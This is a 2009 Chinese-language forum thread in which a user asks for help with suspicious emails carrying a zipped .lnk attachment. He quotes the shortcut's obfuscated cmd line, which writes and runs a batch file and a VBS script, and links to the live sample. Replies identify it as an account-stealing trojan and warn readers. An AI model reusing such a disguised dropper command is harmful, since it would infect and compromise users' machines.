PCDVD數位科技討論區

PCDVD數位科技討論區 (https://www.pcdvd.com.tw/index.php)
-   七嘴八舌異言堂 (https://www.pcdvd.com.tw/forumdisplay.php?f=12)
-   -   最近常收到疑似病毒的信,麻煩大家來幫小弟看看吧!! (https://www.pcdvd.com.tw/showthread.php?t=875258)

misa 2009-11-11 07:21 AM
最近常收到疑似病毒的信,麻煩大家來幫小弟看看吧!!
 
主旨:我做好了,累~~♂
內容:

我做好了,累~~

不知道可不可以,希望妳喜歡……不要作夢也會笑

----------------------------------------------

最近一個我追了很久但一直追不到的妹常常寄類似的信給我
每次看到螢幕右下角跳出"您有一封新郵件"就開心了一下
打開後發現是一封莫名其妙的病毒信整個心情掉到谷底

郵件中都會有一個附加檔案
是一個壓縮檔,解壓縮後會有一個.lnk的捷徑
點兩下執行後什麼事都沒有發生
用NOD32掃瞄後沒有發現病毒
用Google搜尋也沒有找到什麼資料
yahoo 病毒信主旨統計中有這些信的演示,但沒有詳細的資料

在檔案上按右鍵選內容之後如下...


看起來比較可疑的是 目標、開始位置、執行 三個,但我都看不懂...
目標 中寫的是
引用:
%ComsPEc% /C set F=T&SET b= &eCho %f%f%f%P%b%%F%f%f%F%f%.nE%F%%b%Ge%f%%B%%F%%B%V.VbS>l.bat&EcHo s%f%Ar%f%%b%V.vbs>>l.bAt&l.baT

開始位置 中寫的是
引用:
%windir%


附加檔案在此,請小心服用!!!!
http://www.badongo.com/file/18319234

我的電腦目前似乎沒出現什麼問題,反正有問題重灌就好了
我比較擔心的是那位妹妹的帳號會不會被盜,如果被盜了以後就不能跟她聊天了 :cry:
麻煩大家幫小弟看看吧!! 謝謝!!

darksnow 2009-11-11 07:38 AM
這是要盜帳號的吧,通常是要盜拍賣帳號的。
沒記錯的話他應該會連到ftp之類的把真正的病毒抓回來跑

吉他之繩 2009-11-11 08:00 AM
點兩下之後一定會發生一些事情,只是要不要給你看到
我猜,到該網址以後會下載某個vbs
然後就是執行以後的動作了

勸各位:
1.不要打開可疑的信件,看防毒軟體有沒有反應來決定是否有問題。如果該行為「目前」不在防毒軟體認定有問題的條件中,那麼當然會被認為沒問題。將來呢?
2.不要下載樓主所上傳的檔案,因為或許他才是想要傳播的那個人,這封帖子只是個社交手段
3.樓主沒必要把檔案上傳給不確定的大眾觀看,或許這只是個病毒,或許還會盜銀行帳號,造成pcdvd的網友們實質上的損失,那是你的初衷嗎?不是嘛。所以,原始檔案能不上傳就不上傳,大家討論討論就好了,你我都不是病毒公司的專業人員,沒必要冒這個風險。不過就是個妹,要追不追隨便你。你放上來就會引起人家的好奇,這是社交手段的重要因素,盡量避免。

吉他之繩 2009-11-11 08:27 AM
我講一下以前碰過的經驗
我在大陸網站上找到一個snort的解說檔,據該網頁所言,裡面有很多我想要的東西(步驟一,好奇)
然後我把它下載下來並且解開,裡面有三個檔案都是word檔,前兩個word檔沒什麼特別,只有第三個檔案檔名比較特別(步驟二,偽裝)
一般人連開兩個槓龜,下意識的就會打開第三個檔案(步驟三,執行),只是我先發現這個word檔的圖案有點失真,小心了點,用word去打開它,而不是直接點兩下,這才發現打不開。也就是說,根本不是word檔。

這,就是木馬。

在網路的世界裡,知道多的,就是贏家。你以為人家那麼好心,把你想要的東西都放在網路上供不特定人士下載,你以為你聰明,抄了這麼多捷徑,省了這麼多精力,其實,贏的是他。

museshuner 2009-11-11 03:10 PM
引用:
作者吉他之繩
我講一下以前碰過的經驗
我在大陸網站上找到一個snort的解說檔,據該網頁所言,裡面有很多我想要的東西(步驟一,好奇)
然後我把它下載下來並且解開,裡面有三個檔案都是word檔,前兩個word檔沒什麼特別,只有第三個檔案檔名比較特別(步驟二,偽裝)
一般人連開兩個槓龜,下意識的就會打開第三個檔案(步驟三,執行),只是我先發現這個word檔的圖案有點失真,小心了點,用word去打開它,而不是直接點兩下,這才發現打不開。也就是說,根本不是word檔。

這,就是木馬。

在網路的世界裡,知道多的,就是贏家。你以為人家那麼好心,把你想要的東西都放在網路上供不特定人士下載,你以為你聰明,抄了這麼多捷徑,省了這麼多精力,其實,贏的是他。


有經驗 :flash:

misa 2009-11-11 03:44 PM
先說聲抱歉,我不是有意要上傳病毒給大家下載
文章中我也應該注明請大家小心類似的信件不要隨便開啟,不過我忘了
前面寫的那個妹只是一段小插曲,MSN不是唯一的連絡工具
附加的檔案我已經寫信去便當狗請他們刪除了

大家最近有收到類似的信的,小心點不要隨便開啟吧!!
Good Luck !

吉他之繩 2009-11-11 07:21 PM
引用:
作者misa
先說聲抱歉,我不是有意要上傳病毒給大家下載

我想應該也是,我說話是重了點,只是想提醒大家,木馬是無所不在的,千萬不要用防毒軟體去測試,防木馬有防木馬的專用程式,如果把病毒特徵跟木馬全部都放進去防毒程式裡面的話,防毒程式run起來會非常肥大,消費者會排斥進而沒人買,所以短時間內都會是這樣。將來可能會稍微改進吧。

像這個木馬來說,它偽裝成「禮物.lnk」但是實際上不是,裡面其實是個執行檔,這些都有程式(沒錯,給新手用的製作木馬程式)可以做到。它只是看起來像個捷徑,而當你點下去之後,什麼事都沒發生,你以為沒事,就當做一天當中一大堆無解的問題中又一個無解的問題。但是如果你用簡單的程式打開它的話,你會發現第一行就有問題,翻成中文就是「本程式無法執行於dos模式」。你還認為他是個捷徑嗎?

所以,這個時候,木馬已經進城了,在地球的另一端,有一個人的電腦螢幕閃爍起來,上面有你的ip,當他下班之後,發現又多了一個殭屍可以使用,於是,你的電腦就被用來進行犯罪行為而不自知。千萬,千萬不要好奇點點看會不會發生什麼事來決定這件事情恐不恐怖。
免錢的最恐怖,靜悄悄的最恐怖。

以前的病毒,是用來破壞的,它大剌剌的喊著我是病毒,它的目的是提醒你你有多肉雞,而他有多威風。現在的木馬則是用來賺錢的,它不大聲嚷嚷,它靜悄悄的躺在你的硬碟裡,幾秒鐘才跟主人聯絡一下,用的又是一般的協定,像個折凳,隱藏在民居之中......

hyca 2009-11-11 07:30 PM
有沒有可能是你喜歡的女生突然愛上你
然後想了解你的私生活

地海巫師 2009-11-11 07:34 PM
引用:
作者吉他之繩
我講一下以前碰過的經驗
我在大陸網站上找到一個snort的解說檔,據該網頁所言,裡面有很多我想要的東西(步驟一,好奇)
然後我把它下載下來並且解開,裡面有三個檔案都是word檔,前兩個word檔沒什麼特別,只有第三個檔案檔名比較特別(步驟二,偽裝)
一般人連開兩個槓龜,下意識的就會打開第三個檔案(步驟三,執行),只是我先發現這個word檔的圖案有點失真,小心了點,用word去打開它,而不是直接點兩下,這才發現打不開。也就是說,根本不是word檔。

這,就是木馬。


以迂為直,以患為利 :p

lufonts 2009-11-11 07:51 PM
這都是到號木馬阿,YAHOO信箱蠻常見的,

通常都是對方去點那個木馬,然後他通訊錄裡的所有人都會收到同一封病毒信。


所有的時間均為GMT +8。 現在的時間是02:06 AM.

vBulletin Version 3.0.1
powered_by_vbulletin 2026。